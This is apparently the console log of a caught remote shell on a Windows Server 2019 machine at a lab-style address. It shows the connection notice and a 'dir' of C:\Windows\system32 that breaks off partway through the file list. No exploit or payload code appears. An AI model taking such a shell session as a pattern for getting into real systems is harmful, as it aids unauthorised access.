Connection from 10.10.10.27:49739
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>dir
 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of C:\Windows\system32

01/19/2020  04:10 PM    <DIR>          .
01/19/2020  04:10 PM    <DIR>          ..
09/15/2018  02:06 AM    <DIR>          0409
01/19/2020  04:09 PM    <DIR>          1033
09/15/2018  12:09 AM             2,151 12520437.cpx
09/15/2018  12:09 AM             2,233 12520850.cpx
09/15/2018  12:09 AM           394,240 AcLayers.dll
09/15/2018  12:09 AM         5,384,704 aclui.dll
09/15/2018  12:09 AM           219,648 activeds.dll
09/15/2018  12:09 AM           112,128 activeds.tlb
09/15/2018  12:09 AM           271,360 actxprxy.dll
09/15/2018  12:10 AM            32,256 AcWinRT.dll
09/15/2018  12:09 AM            37,888 acwow64.dll
09/15/2018  12:09 AM            87,040 AcXtrnal.dll
09/15/2018  12:09 AM           429,056 AdmTmpl.dll
09/15/2018  12:10 AM            49,152 adprovider.dll
09/15/2018  12:09 AM           199,680 adsldp.dll
09/15/2018  12:09 AM           208,896 adsldpc.dll
09/15/2018  12:09 AM            84,992 adsmsext.dll
09/15/2018  12:09 AM           288,256 adsnt.dll
09/15/2018  12:09 AM             2,560 adtschema.dll
09/15/2018  12:12 AM    <DIR>          AdvancedInstallers
09/15/2018  12:09 AM           507,400 advapi32.dll
09/15/2018  12:09 AM             2,560 advapi32res.dll
09/15/2018  12:09 AM           120,832 advpack.dll
09/15/2018  12:09 AM           379,920 aepic.dll
09/15/2018  12:10 AM           163,328 altspace.dll
09/15/2018  12:09 AM           624,640 apphelp.dll
09/15/2018  12:09 AM           294,912 AppIdPolicyEngineApi.dll
09/15/2018  12:09 AM           160,768 appmgmts.dll
09/15/2018  12:09 AM           370,688 appmgr.dll
09/15/2018  12:10 AM           274,432 AppxAllUserStore.dll
09/15/2018  12:10 AM             3,022 AppxProvisioning.xml
09/15/2018  12:12 AM    <DIR>          ar-SA
09/15/2018  12:09 AM            22,528 ARP.EXE
09/15/2018  12:10 AM            29,344 aspnet_counters.dll
09/15/2018  12:09 AM            75,264 asycfilt.dll
09/15/2018  12:09 AM            25,088 at.exe
09/15/2018  12:09 AM            80,896 atl.dll
09/15/2018  12:09 AM            38,912 atmlib.dll
09/15/2018  12:09 AM            19,456 attrib.exe
09/15/2018  12:09 AM           219,136 AuditNativeSnapIn.dll
09/15/2018  12:09 AM            28,672 auditpol.exe
09/15/2018  12:09 AM            55,296 auditpolcore.dll
09/15/2018  12:09 AM            57,344 AuditPolicyGPInterop.dll
09/15/2018  12:09 AM            95,744 auditpolmsg.dll
09/15/2018  12:09 AM           361,984 authfwcfg.dll
09/15/2018  12:09 AM           420,864 authui.dll
09/15/2018  12:09 AM           185,856 authz.dll
09/15/2018  12:09 AM           871,424 autochk.exe
09/15/2018  12:09 AM           852,480 autoconv.exe
09/15/2018  12:09 AM           830,976 autofmt.exe
09/15/2018  12:10 AM           779,776 azroles.dll
09/15/2018  12:10 AM            25,088 AzSqlExt.dll
09/15/2018  12:10 AM           180,536 basecsp.dll
09/15/2018  12:09 AM           104,984 bcd.dll
09/15/2018  12:09 AM           279,416 BCP47Langs.dll
09/15/2018  12:09 AM           112,256 BCP47mrm.dll
09/15/2018  12:09 AM            96,760 bcrypt.dll
09/15/2018  12:09 AM           398,208 bcryptprimitives.dll
09/15/2018  12:12 AM    <DIR>          bg-BG
09/15/2018  12:09 AM            25,088 bitsperf.dll
09/15/2018  12:09 AM            47,616 BitsProxy.dll
09/15/2018  12:10 AM         3,170,304 boot.sdi
09/15/2018  12:09 AM            82,432 bootcfg.exe
09/15/2018  12:09 AM            24,072 BOOTVID.DLL
09/15/2018  12:10 AM            43,008 browcli.dll
09/15/2018  12:09 AM            69,120 cabapi.dll
09/15/2018  12:09 AM           119,800 cabinet.dll
09/15/2018  12:09 AM            27,648 cacls.exe
09/15/2018  12:10 AM            53,248 capiprovider.dll
09/15/2018  12:09 AM            20,992 capisp.dll
09/15/2018  12:12 AM    <DIR>          catroot
09/15/2018  12:10 AM           387,072 catsrv.dll
09/15/2018  12:10 AM            24,064 catsrvps.dll
09/15/2018  12:10 AM           410,624 catsrvut.dll
09/15/2018  12:09 AM            24,064 cbclient.dll
09/15/2018  12:10 AM           649,728 certca.dll
09/15/2018  12:10 AM           346,624 certcli.dll
09/15/2018  12:09 AM           320,000 certCredProvider.dll
09/15/2018  12:10 AM            54,272 certenc.dll
09/15/2018  12:10 AM         2,839,040 CertEnroll.dll
09/15/2018  12:10 AM            42,496 CertEnrollCtrl.exe
09/15/2018  12:10 AM            50,176 CertPKICmdlet.dll
09/15/2018  12:10 AM           105,984 CertPolEng.dll
09/15/2018  12:09 AM           428,544 certreq.exe
09/15/2018  12:10 AM         1,270,784 certutil.exe
09/15/2018  12:09 AM            63,488 cfgbkend.dll
09/15/2018  12:09 AM           235,496 cfgmgr32.dll
09/15/2018  12:10 AM            34,816 cfmifs.dll
09/15/2018  12:10 AM            11,264 cfmifsproxy.dll
09/15/2018  12:09 AM            14,848 change.exe
09/15/2018  12:09 AM           105,984 chartv.dll
09/15/2018  12:09 AM            12,800 chcp.com
09/15/2018  12:09 AM            26,112 CheckNetIsolation.exe
09/15/2018  12:09 AM            19,456 chglogon.exe
09/15/2018  12:09 AM            20,992 chgport.exe
09/15/2018  12:09 AM            19,456 chgusr.exe
09/15/2018  12:09 AM            23,040 chkdsk.exe
09/15/2018  12:09 AM            19,456 chkntfs.exe
09/15/2018  12:09 AM            28,160 choice.exe
09/15/2018  12:09 AM            10,752 CHxReadingStringIME.dll
09/15/2018  12:09 AM            39,936 cipher.exe
09/15/2018  12:10 AM            32,256 CIWmi.dll
09/15/2018  12:10 AM            14,848 clb.dll
09/15/2018  12:10 AM           515,624 clbcatq.dll
09/15/2018  12:09 AM            59,392 clfsw32.dll
09/15/2018  12:09 AM            78,336 cliconfg.dll
09/15/2018  12:09 AM            28,672 cliconfg.exe
09/15/2018  12:09 AM            37,376 cliconfg.rll
09/15/2018  12:09 AM            24,576 clip.exe
09/15/2018  12:09 AM            13,312 clrhost.dll
09/15/2018  12:09 AM           796,672 clusapi.dll
09/15/2018  12:09 AM           236,544 cmd.exe
09/15/2018  12:09 AM            19,968 cmdext.dll
09/15/2018  12:09 AM            17,408 cmdkey.exe
09/15/2018  12:10 AM            86,032 cmifw.dll
09/15/2018  12:09 AM           104,448 cngcredui.dll
09/15/2018  12:10 AM            55,808 cngprovider.dll
09/15/2018  12:09 AM            34,304 cnvfat.dll
09/15/2018  12:10 AM            68,608 colbact.dll
09/15/2018  12:09 AM            34,816 coloradapterclient.dll
09/15/2018  02:06 AM    <DIR>          com
09/15/2018  12:09 AM         2,621,192 combase.dll
09/15/2018  12:10 AM             8,192 comcat.dll
09/15/2018  12:09 AM           569,856 comctl32.dll
09/15/2018  12:09 AM           993,792 comdlg32.dll
09/15/2018  12:10 AM           369,976 coml2.dll
09/15/2018  12:09 AM            23,552 comp.exe
09/15/2018  12:09 AM            40,448 compact.exe
09/15/2018  12:09 AM            91,424 CompPkgSup.dll
09/15/2018  12:10 AM           114,176 comrepl.dll
09/15/2018  12:10 AM             2,560 comres.dll
09/15/2018  12:10 AM         1,346,560 comsvcs.dll
10/10/2017  09:01 PM           248,616 concrt140.dll
09/15/2018  12:12 AM    <DIR>          config
09/15/2018  12:10 AM           109,568 console.dll
09/15/2018  12:10 AM           250,880 ConsoleLogon.dll
09/15/2018  12:09 AM           114,688 control.exe
09/15/2018  12:09 AM            19,456 convert.exe
10/29/2018  03:37 PM           582,040 CoreMessaging.dll
09/15/2018  12:10 AM           109,488 CredentialUIBroker.exe
09/15/2018  12:10 AM            80,384 CredProv2faHelper.dll
09/15/2018  12:10 AM           475,648 CredProvDataModel.dll
09/15/2018  12:10 AM            65,536 CredProvHelper.dll
09/15/2018  12:10 AM           280,576 credprovhost.dll
09/15/2018  12:10 AM           263,168 credprovs.dll
09/15/2018  12:10 AM           158,208 credprovslegacy.dll
09/15/2018  12:10 AM            19,456 credssp.dll
09/15/2018  12:10 AM            35,840 credui.dll
09/15/2018  12:09 AM         1,668,784 crypt32.dll
09/15/2018  12:09 AM            31,728 cryptbase.dll
09/15/2018  12:09 AM            57,032 cryptdll.dll
09/15/2018  12:09 AM           135,680 cryptnet.dll
09/15/2018  12:09 AM           282,624 CryptoWinRT.dll
09/15/2018  12:09 AM            67,648 cryptsp.dll
09/15/2018  12:09 AM            45,056 crypttpmeksvc.dll
09/15/2018  12:09 AM           548,864 cryptui.dll
09/15/2018  12:09 AM           365,056 cryptuiwizard.dll
09/15/2018  12:09 AM            98,592 cryptxml.dll
09/15/2018  12:12 AM    <DIR>          cs-CZ
09/15/2018  12:09 AM            40,960 cscapi.dll
09/15/2018  12:09 AM            22,016 cscdll.dll
09/15/2018  12:09 AM           145,408 cscript.exe
09/15/2018  12:09 AM             9,728 ctfmon.exe
09/15/2018  12:10 AM           224,768 C_G18030.DLL
09/15/2018  12:10 AM            12,288 c_GSM7.DLL
09/15/2018  12:10 AM            13,824 C_IS2022.DLL
09/15/2018  12:10 AM            12,288 C_ISCII.DLL
09/15/2018  12:09 AM         2,264,344 d3d11.dll
09/15/2018  12:09 AM           439,976 d3d11on12.dll
09/15/2018  12:09 AM         1,457,032 D3D12.dll
09/15/2018  12:09 AM            12,800 d3d8thk.dll
09/15/2018  12:09 AM         1,495,248 d3d9.dll
09/15/2018  12:09 AM         3,689,984 D3DCompiler_47.dll
09/15/2018  12:12 AM    <DIR>          da-DK
09/15/2018  12:09 AM             8,704 dabapi.dll
09/15/2018  12:09 AM            22,016 davhlpr.dll
09/15/2018  12:09 AM           132,096 dbgcore.dll
09/15/2018  12:09 AM         5,130,240 dbgeng.dll
09/15/2018  12:09 AM         1,522,176 dbghelp.dll
09/15/2018  12:09 AM           500,224 DbgModel.dll
09/15/2018  12:09 AM           104,960 dbnetlib.dll
09/15/2018  12:09 AM            19,456 dbnmpntw.dll
09/15/2018  12:09 AM            50,176 dcgpofix.exe
09/15/2018  12:09 AM            11,776 dciman32.dll
09/15/2018  12:12 AM    <DIR>          de-DE
09/15/2018  12:09 AM            19,968 delegatorprovider.dll
09/15/2018  12:10 AM           153,088 devicengccredprov.dll
09/15/2018  12:09 AM           135,304 devobj.dll
09/15/2018  12:09 AM            50,688 devrtl.dll
09/15/2018  12:09 AM            44,032 dfscli.dll
09/15/2018  12:09 AM         1,178,112 dfshim.dll
09/15/2018  12:09 AM            12,288 dhcpcmonitor.dll
09/15/2018  12:09 AM           324,608 dhcpcore.dll
09/15/2018  12:09 AM           263,680 dhcpcore6.dll
09/15/2018  12:09 AM            69,120 dhcpcsvc.dll
09/15/2018  12:09 AM            58,368 dhcpcsvc6.dll
09/15/2018  12:09 AM           138,240 dhcpsapi.dll
09/15/2018  12:10 AM           349,184 difxapi.dll
09/15/2018  12:10 AM            35,840 dimsjob.dll
09/15/2018  12:10 AM            39,424 dimsroam.dll
09/15/2018  12:09 AM           515,960 directmanipulation.dll
09/15/2018  12:09 AM           150,528 diskpart.exe
09/15/2018  12:09 AM            20,992 diskperf.exe
09/15/2018  02:06 AM    <DIR>          Dism
09/15/2018  12:09 AM           231,224 Dism.exe
09/15/2018  12:09 AM           766,264 DismApi.dll
09/15/2018  12:09 AM            16,896 dispex.dll
09/15/2018  12:09 AM            19,256 dllhost.exe
09/15/2018  12:10 AM            10,752 dllhst3g.exe
09/15/2018  12:09 AM           580,024 dnsapi.dll
09/15/2018  12:09 AM            16,384 doskey.exe
09/15/2018  12:12 AM    <DIR>          downlevel
09/15/2018  12:09 AM            13,312 dpapi.dll
09/15/2018  12:09 AM            73,216 dpapimig.exe
09/15/2018  12:10 AM            48,640 dpapiprovider.dll
09/15/2018  12:09 AM           468,280 dpx.dll
09/15/2018  12:09 AM            66,560 driverquery.exe
09/15/2018  02:06 AM    <DIR>          drivers
09/15/2018  02:06 AM    <DIR>          DriverStore
09/15/2018  12:10 AM            20,480 drprov.dll
09/15/2018  12:09 AM            84,480 drvsetup.dll
09/15/2018  12:09 AM           970,040 drvstore.dll
09/15/2018  12:09 AM            38,912 dsauth.dll
09/15/2018  12:09 AM           103,424 dskquota.dll
09/15/2018  12:09 AM            24,064 dsparse.dll
09/15/2018  12:09 AM           143,872 dsprop.dll
09/15/2018  12:09 AM            24,288 dsrole.dll
09/15/2018  12:11 AM           215,943 dssec.dat
09/15/2018  12:09 AM            48,640 dssec.dll
09/15/2018  12:09 AM           134,280 dssenh.dll
09/15/2018  12:09 AM           672,256 dsuiext.dll
09/15/2018  12:09 AM            79,872 dtdump.exe
09/15/2018  12:09 AM         1,474,560 dui70.dll
09/15/2018  12:09 AM           473,600 duser.dll
09/15/2018  12:09 AM           140,288 dwmapi.dll
09/15/2018  12:09 AM         2,651,648 DWrite.dll
09/15/2018  12:09 AM           661,096 dxgi.dll
09/15/2018  12:09 AM           238,080 eapp3hst.dll
09/15/2018  12:09 AM           197,632 eappcfg.dll
09/15/2018  12:09 AM            90,112 eappgnui.dll
09/15/2018  12:09 AM           230,912 eapphost.dll
09/15/2018  12:09 AM            55,808 eappprxy.dll
10/29/2018  03:37 PM           330,752 edgeIso.dll
09/15/2018  12:09 AM            53,248 efsext.dll
09/15/2018  12:09 AM            35,840 efsutil.dll
09/15/2018  12:12 AM    <DIR>          el-GR
09/15/2018  12:12 AM    <DIR>          en-GB
09/15/2018  02:06 AM    <DIR>          en-US
09/15/2018  12:09 AM            93,952 EncDump.dll
09/15/2018  12:12 AM    <DIR>          es-ES
09/15/2018  12:12 AM    <DIR>          es-MX
09/15/2018  12:10 AM           335,360 es.dll
09/15/2018  12:10 AM            16,896 EsdSip.dll
09/15/2018  12:09 AM         2,929,152 esent.dll
09/15/2018  12:09 AM            61,440 esentprf.dll
09/15/2018  12:09 AM           331,264 esentutl.exe
09/15/2018  12:09 AM            33,792 esevss.dll
09/15/2018  12:12 AM    <DIR>          et-EE
09/15/2018  12:09 AM            78,848 ETWESEProviderResources.dll
09/15/2018  12:10 AM            40,448 EtwRundown.dll
09/15/2018  12:09 AM            14,848 eventcls.dll
09/15/2018  12:09 AM            33,792 eventcreate.exe
09/15/2018  12:10 AM            52,736 expand.exe
09/15/2018  12:10 AM             8,704 f3ahvoas.dll
09/15/2018  12:09 AM           387,832 Faultrep.dll
09/15/2018  12:09 AM            22,528 fc.exe
09/15/2018  12:09 AM           196,608 feclient.dll
09/15/2018  12:12 AM    <DIR>          fi-FI
09/15/2018  12:09 AM            14,848 find.exe
09/15/2018  12:09 AM            29,696 findstr.exe
09/15/2018  12:09 AM            13,312 finger.exe
09/15/2018  12:10 AM           384,000 FirewallAPI.dll
09/15/2018  12:10 AM           730,112 FlightSettings.dll
09/15/2018  12:09 AM            27,840 fltLib.dll
09/15/2018  12:09 AM            24,064 fltMC.exe
09/15/2018  12:09 AM            54,800 fmifs.dll
09/15/2018  12:09 AM           158,208 fms.dll
09/15/2018  12:09 AM           107,008 Fondue.exe
09/15/2018  12:09 AM           660,232 fontdrvhost.exe
09/15/2018  12:09 AM            98,816 fontsub.dll
09/15/2018  12:09 AM            40,960 forfiles.exe
09/15/2018  12:09 AM            46,080 format.com
09/15/2018  12:12 AM    <DIR>          fr-CA
09/15/2018  12:12 AM    <DIR>          fr-FR
09/15/2018  12:10 AM           198,144 framedyn.dll
09/15/2018  12:10 AM           238,080 framedynos.dll
09/15/2018  12:09 AM           147,968 fsutil.exe
09/15/2018  12:09 AM            26,624 fsutilext.dll
09/15/2018  12:09 AM            48,640 ftp.exe
09/15/2018  12:10 AM           666,624 fveapi.dll
09/15/2018  12:10 AM           311,808 fveapibase.dll
09/15/2018  12:10 AM            21,504 fvecerts.dll
09/15/2018  12:10 AM           129,536 fwbase.dll
09/15/2018  12:09 AM            45,056 fwcfg.dll
09/15/2018  12:10 AM           190,464 fwpolicyiomgr.dll
09/15/2018  12:10 AM           313,856 FWPUCLNT.DLL
09/15/2018  12:09 AM            58,880 FwRemoteSvr.dll
09/15/2018  12:09 AM           138,376 gdi32.dll
10/29/2018  03:37 PM         1,466,992 gdi32full.dll
09/15/2018  12:09 AM            32,768 gmsaclient.dll
09/15/2018  12:09 AM           111,024 gpapi.dll
09/15/2018  12:09 AM         1,042,944 gpedit.dll
09/15/2018  12:09 AM           147,439 gpedit.msc
09/15/2018  12:09 AM           564,736 gpprefcl.dll
09/15/2018  12:09 AM           195,072 gpresult.exe
09/15/2018  12:09 AM            40,960 gpscript.dll
09/15/2018  12:09 AM            37,888 gpscript.exe
09/15/2018  12:09 AM            24,576 gpupdate.exe
09/15/2018  12:12 AM    <DIR>          GroupPolicy
09/15/2018  12:12 AM    <DIR>          GroupPolicyUsers
09/15/2018  12:09 AM            67,584 hbaapi.dll
09/15/2018  12:12 AM    <DIR>          he-IL
09/15/2018  12:09 AM             9,728 help.exe
09/15/2018  12:09 AM            28,160 hid.dll
09/15/2018  12:09 AM            29,696 hidserv.dll
09/15/2018  12:09 AM            11,776 HOSTNAME.EXE
09/15/2018  12:12 AM    <DIR>          hr-HR
09/15/2018  12:09 AM            27,648 httpapi.dll
09/15/2018  12:12 AM    <DIR>          hu-HU
09/15/2018  12:09 AM            29,696 icacls.exe
09/15/2018  12:09 AM           236,032 icm32.dll
09/15/2018  12:09 AM             2,560 icmp.dll
09/15/2018  12:09 AM            15,872 icsunattend.exe
09/15/2018  12:12 AM    <DIR>          icsxml
09/15/2018  12:10 AM             7,680 idndl.dll
09/15/2018  12:09 AM         2,275,888 iertutil.dll
09/15/2018  12:09 AM            25,600 ifmon.dll
09/15/2018  12:09 AM           188,432 ifsutil.dll
09/15/2018  12:10 AM            14,336 ifsutilx.dll
09/15/2018  12:09 AM            95,488 imagehlp.dll
09/15/2018  12:09 AM        23,542,784 imageres.dll
09/15/2018  12:12 AM    <DIR>          IME
09/15/2018  12:09 AM           144,312 imm32.dll
09/15/2018  12:09 AM            53,248 inetmib1.dll
09/15/2018  12:12 AM    <DIR>          inetsrv
09/15/2018  12:10 AM            11,776 InfDefaultInstall.exe
09/15/2018  12:09 AM           304,952 input.dll
09/15/2018  12:09 AM           414,208 InputSwitch.dll
09/15/2018  12:12 AM    <DIR>          InstallShield
09/15/2018  12:09 AM             8,704 instnm.exe
09/15/2018  12:09 AM           444,416 intl.cpl
09/15/2018  12:09 AM             2,560 iologmsg.dll
09/15/2018  12:09 AM            29,184 ipconfig.exe
09/15/2018  12:09 AM           197,832 IPHLPAPI.DLL
09/15/2018  12:12 AM    <DIR>          Ipmi
09/15/2018  12:09 AM             9,216 iprtprio.dll
09/15/2018  12:09 AM           516,608 iprtrmgr.dll
09/15/2018  12:09 AM           150,528 iscsicli.exe
09/15/2018  12:09 AM            55,296 iscsidsc.dll
09/15/2018  12:09 AM             9,728 iscsied.dll
09/15/2018  12:09 AM            29,184 iscsium.dll
09/15/2018  12:09 AM            67,584 iscsiwmi.dll
09/15/2018  12:09 AM            94,720 iscsiwmiv2.dll
09/15/2018  12:12 AM    <DIR>          it-IT
09/15/2018  12:12 AM    <DIR>          ja-JP
09/15/2018  12:09 AM            47,616 joinproviderol.dll
09/15/2018  12:09 AM           144,896 joinutil.dll
09/15/2018  12:09 AM           684,032 jscript.dll
09/15/2018  12:09 AM            45,568 jsproxy.dll
09/15/2018  12:10 AM             7,680 kbd101.DLL
09/15/2018  12:10 AM             7,168 kbd101a.DLL
09/15/2018  12:10 AM             7,168 kbd101b.DLL
09/15/2018  12:10 AM             7,168 kbd101c.DLL
09/15/2018  12:10 AM             7,168 kbd103.DLL
09/15/2018  12:10 AM             7,680 kbd106.dll
09/15/2018  12:10 AM             7,680 kbd106n.dll
09/15/2018  12:10 AM             7,168 KBDA1.DLL
09/15/2018  12:10 AM             6,656 KBDA2.DLL
09/15/2018  12:10 AM             7,168 KBDA3.DLL
09/15/2018  12:10 AM             7,680 KBDAL.DLL
09/15/2018  12:10 AM             6,656 KBDARME.DLL
09/15/2018  12:10 AM             7,168 kbdarmph.dll
09/15/2018  12:10 AM             7,168 kbdarmty.dll
09/15/2018  12:10 AM             6,656 KBDARMW.DLL
09/15/2018  12:10 AM             7,680 kbdax2.dll
09/15/2018  12:10 AM             7,168 KBDAZE.DLL
09/15/2018  12:10 AM             7,168 KBDAZEL.DLL
09/15/2018  12:10 AM             7,168 KBDAZST.DLL
09/15/2018  12:10 AM             7,168 KBDBASH.DLL
09/15/2018  12:10 AM             7,168 KBDBE.DLL
09/15/2018  12:10 AM             7,680 KBDBENE.DLL
09/15/2018  12:10 AM             7,168 KBDBGPH.DLL
09/15/2018  12:10 AM             7,168 KBDBGPH1.DLL
09/15/2018  12:10 AM             7,168 KBDBHC.DLL
09/15/2018  12:10 AM             7,168 KBDBLR.DLL
09/15/2018  12:10 AM             7,168 KBDBR.DLL
09/15/2018  12:10 AM             6,656 KBDBU.DLL
09/15/2018  12:10 AM             7,168 KBDBUG.DLL
09/15/2018  12:10 AM             7,168 KBDBULG.DLL
09/15/2018  12:10 AM             7,680 KBDCA.DLL
09/15/2018  12:10 AM             8,704 KBDCAN.DLL
09/15/2018  12:10 AM             7,168 KBDCHER.DLL
09/15/2018  12:10 AM            16,896 KBDCHERP.DLL
09/15/2018  12:10 AM             8,192 KBDCR.DLL
09/15/2018  12:10 AM             8,192 KBDCZ.DLL
09/15/2018  12:10 AM             8,192 KBDCZ1.DLL
09/15/2018  12:10 AM             8,192 KBDCZ2.DLL
09/15/2018  12:10 AM             6,656 KBDDA.DLL
09/15/2018  12:10 AM             7,168 KBDDIV1.DLL
09/15/2018  12:10 AM             7,168 KBDDIV2.DLL
09/15/2018  12:10 AM             6,656 KBDDV.DLL
09/15/2018  12:10 AM             7,168 KBDDZO.DLL
09/15/2018  12:10 AM             7,680 KBDES.DLL
09/15/2018  12:10 AM             7,168 KBDEST.DLL
09/15/2018  12:10 AM             6,656 KBDFA.DLL
09/15/2018  12:10 AM             7,168 kbdfar.dll
09/15/2018  12:10 AM             7,680 KBDFC.DLL
09/15/2018  12:10 AM             6,656 KBDFI.DLL
09/15/2018  12:10 AM             8,192 KBDFI1.DLL
09/15/2018  12:10 AM             6,656 KBDFO.DLL
09/15/2018  12:10 AM             7,168 KBDFR.DLL
09/15/2018  12:10 AM             7,168 KBDFTHRK.DLL
09/15/2018  12:10 AM             7,168 KBDGAE.DLL
09/15/2018  12:10 AM             6,656 KBDGEO.DLL
09/15/2018  12:10 AM             7,168 kbdgeoer.dll
09/15/2018  12:10 AM             7,168 kbdgeome.dll
09/15/2018  12:10 AM             7,168 kbdgeooa.dll
09/15/2018  12:10 AM             7,168 kbdgeoqw.dll
09/15/2018  12:10 AM             7,680 KBDGKL.DLL
09/15/2018  12:10 AM             7,680 KBDGN.DLL
09/15/2018  12:10 AM             7,168 KBDGR.DLL
09/15/2018  12:10 AM             7,680 KBDGR1.DLL
09/15/2018  12:10 AM             8,192 KBDGRLND.DLL
09/15/2018  12:10 AM             7,168 KBDGTHC.DLL
09/15/2018  12:10 AM             6,656 KBDHAU.DLL
09/15/2018  12:10 AM             7,168 KBDHAW.DLL
09/15/2018  12:10 AM             6,656 KBDHE.DLL
09/15/2018  12:10 AM             7,168 KBDHE220.DLL
09/15/2018  12:10 AM             7,168 KBDHE319.DLL
09/15/2018  12:10 AM             6,656 KBDHEB.DLL
09/15/2018  12:10 AM             7,168 kbdhebl3.dll
09/15/2018  12:10 AM             7,168 KBDHELA2.DLL
09/15/2018  12:10 AM             7,680 KBDHELA3.DLL
09/15/2018  12:10 AM             9,728 KBDHEPT.DLL
09/15/2018  12:10 AM             7,680 KBDHU.DLL
09/15/2018  12:10 AM             7,168 KBDHU1.DLL
09/15/2018  12:10 AM             7,680 kbdibm02.DLL
09/15/2018  12:10 AM             7,168 KBDIBO.DLL
09/15/2018  12:10 AM             6,656 KBDIC.DLL
09/15/2018  12:10 AM             7,168 KBDINASA.DLL
09/15/2018  12:10 AM             7,168 KBDINBE1.DLL
09/15/2018  12:10 AM             7,168 KBDINBE2.DLL
09/15/2018  12:10 AM             7,168 KBDINBEN.DLL
09/15/2018  12:10 AM             7,168 KBDINDEV.DLL
09/15/2018  12:10 AM             8,192 KBDINEN.DLL
09/15/2018  12:10 AM             7,168 KBDINGUJ.DLL
09/15/2018  12:10 AM             7,168 KBDINHIN.DLL
09/15/2018  12:10 AM             7,168 KBDINKAN.DLL
09/15/2018  12:10 AM             7,168 KBDINMAL.DLL
09/15/2018  12:10 AM             7,168 KBDINMAR.DLL
09/15/2018  12:10 AM             7,168 KBDINORI.DLL
09/15/2018  12:10 AM             7,168 KBDINPUN.DLL
09/15/2018  12:10 AM             7,168 KBDINTAM.DLL
09/15/2018  12:10 AM             7,168 KBDINTEL.DLL
09/15/2018  12:10 AM             8,192 KBDINUK2.DLL
09/15/2018  12:10 AM             6,656 KBDIR.DLL
09/15/2018  12:10 AM             6,144 KBDIT.DLL
09/15/2018  12:10 AM             6,656 KBDIT142.DLL
09/15/2018  12:10 AM             7,680 KBDIULAT.DLL
09/15/2018  12:10 AM             7,168 KBDJAV.DLL
09/15/2018  12:10 AM            13,824 KBDJPN.DLL
09/15/2018  12:10 AM             7,168 KBDKAZ.DLL
09/15/2018  12:10 AM             7,168 KBDKHMR.DLL
09/15/2018  12:10 AM             7,168 KBDKNI.DLL
09/15/2018  12:10 AM            13,312 KBDKOR.DLL
09/15/2018  12:10 AM             7,168 KBDKURD.DLL
09/15/2018  12:10 AM             6,656 KBDKYR.DLL
09/15/2018  12:10 AM             7,680 KBDLA.DLL
09/15/2018  12:10 AM             7,168 KBDLAO.DLL
09/15/2018  12:10 AM             7,168 kbdlisub.dll
09/15/2018  12:10 AM             7,168 kbdlisus.dll
09/15/2018  12:10 AM             7,680 kbdlk41a.dll
09/15/2018  12:10 AM             6,656 KBDLT.DLL
09/15/2018  12:10 AM             7,168 KBDLT1.DLL
09/15/2018  12:10 AM             7,168 KBDLT2.DLL
09/15/2018  12:10 AM             7,168 KBDLV.DLL
09/15/2018  12:10 AM             7,680 KBDLV1.DLL
09/15/2018  12:10 AM             8,704 KBDLVST.DLL
09/15/2018  12:10 AM             7,168 KBDMAC.DLL
09/15/2018  12:10 AM             7,168 KBDMACST.DLL
09/15/2018  12:10 AM             7,168 KBDMAORI.DLL
09/15/2018  12:10 AM             7,168 KBDMLT47.DLL
09/15/2018  12:10 AM             7,168 KBDMLT48.DLL
09/15/2018  12:10 AM             7,168 KBDMON.DLL
09/15/2018  12:10 AM             7,168 KBDMONMO.DLL
09/15/2018  12:10 AM             7,168 KBDMONST.DLL
09/15/2018  12:10 AM             7,168 KBDMYAN.DLL
09/15/2018  12:10 AM             7,168 KBDNE.DLL
09/15/2018  12:10 AM             8,192 kbdnec.DLL
09/15/2018  12:10 AM             8,192 kbdnec95.DLL
09/15/2018  12:10 AM             9,728 kbdnecat.DLL
09/15/2018  12:10 AM             8,192 kbdnecnt.DLL
09/15/2018  12:10 AM             7,680 KBDNEPR.DLL
09/15/2018  12:10 AM             6,656 kbdnko.dll
09/15/2018  12:10 AM             6,656 KBDNO.DLL
09/15/2018  12:10 AM             8,192 KBDNO1.DLL
09/15/2018  12:10 AM             7,680 KBDNSO.DLL
09/15/2018  12:10 AM             7,168 KBDNTL.DLL
09/15/2018  12:10 AM             6,656 KBDOGHAM.DLL
09/15/2018  12:10 AM             7,168 KBDOLCH.DLL
09/15/2018  12:10 AM             7,168 KBDOLDIT.DLL
09/15/2018  12:10 AM             6,656 KBDOSM.DLL
09/15/2018  12:10 AM             7,168 KBDPASH.DLL
09/15/2018  12:10 AM             7,168 kbdphags.dll
09/15/2018  12:10 AM             7,680 KBDPL.DLL
09/15/2018  12:10 AM             7,168 KBDPL1.DLL
09/15/2018  12:10 AM             7,680 KBDPO.DLL
09/15/2018  12:10 AM             8,192 KBDRO.DLL
09/15/2018  12:10 AM             8,704 KBDROPR.DLL
09/15/2018  12:10 AM             8,704 KBDROST.DLL
09/15/2018  12:10 AM             6,656 KBDRU.DLL
09/15/2018  12:10 AM             7,168 KBDRU1.DLL
09/15/2018  12:10 AM             8,192 KBDRUM.DLL
09/15/2018  12:10 AM             7,680 KBDSF.DLL
09/15/2018  12:10 AM             7,680 KBDSG.DLL
09/15/2018  12:10 AM             7,680 KBDSL.DLL
09/15/2018  12:10 AM             8,192 KBDSL1.DLL
09/15/2018  12:10 AM             8,704 KBDSMSFI.DLL
09/15/2018  12:10 AM             8,704 KBDSMSNO.DLL
09/15/2018  12:10 AM             6,656 KBDSN1.DLL
09/15/2018  12:10 AM             6,656 KBDSORA.DLL
09/15/2018  12:10 AM             7,680 KBDSOREX.DLL
09/15/2018  12:10 AM             7,680 KBDSORS1.DLL
09/15/2018  12:10 AM             7,680 KBDSORST.DLL
09/15/2018  12:10 AM             7,168 KBDSP.DLL
09/15/2018  12:10 AM             7,168 KBDSW.DLL
09/15/2018  12:10 AM             7,680 KBDSW09.DLL
09/15/2018  12:10 AM             7,168 KBDSYR1.DLL
09/15/2018  12:10 AM             7,168 KBDSYR2.DLL
09/15/2018  12:10 AM             7,168 KBDTAILE.DLL
09/15/2018  12:10 AM             7,168 KBDTAJIK.DLL
09/15/2018  12:10 AM             7,168 KBDTAT.DLL
09/15/2018  12:10 AM             7,168 KBDTH0.DLL
09/15/2018  12:10 AM             7,168 KBDTH1.DLL
09/15/2018  12:10 AM             7,168 KBDTH2.DLL
09/15/2018  12:10 AM             7,168 KBDTH3.DLL
09/15/2018  12:10 AM             7,168 KBDTIFI.DLL
09/15/2018  12:10 AM             7,168 KBDTIFI2.DLL
09/15/2018  12:10 AM             7,680 KBDTIPRC.DLL
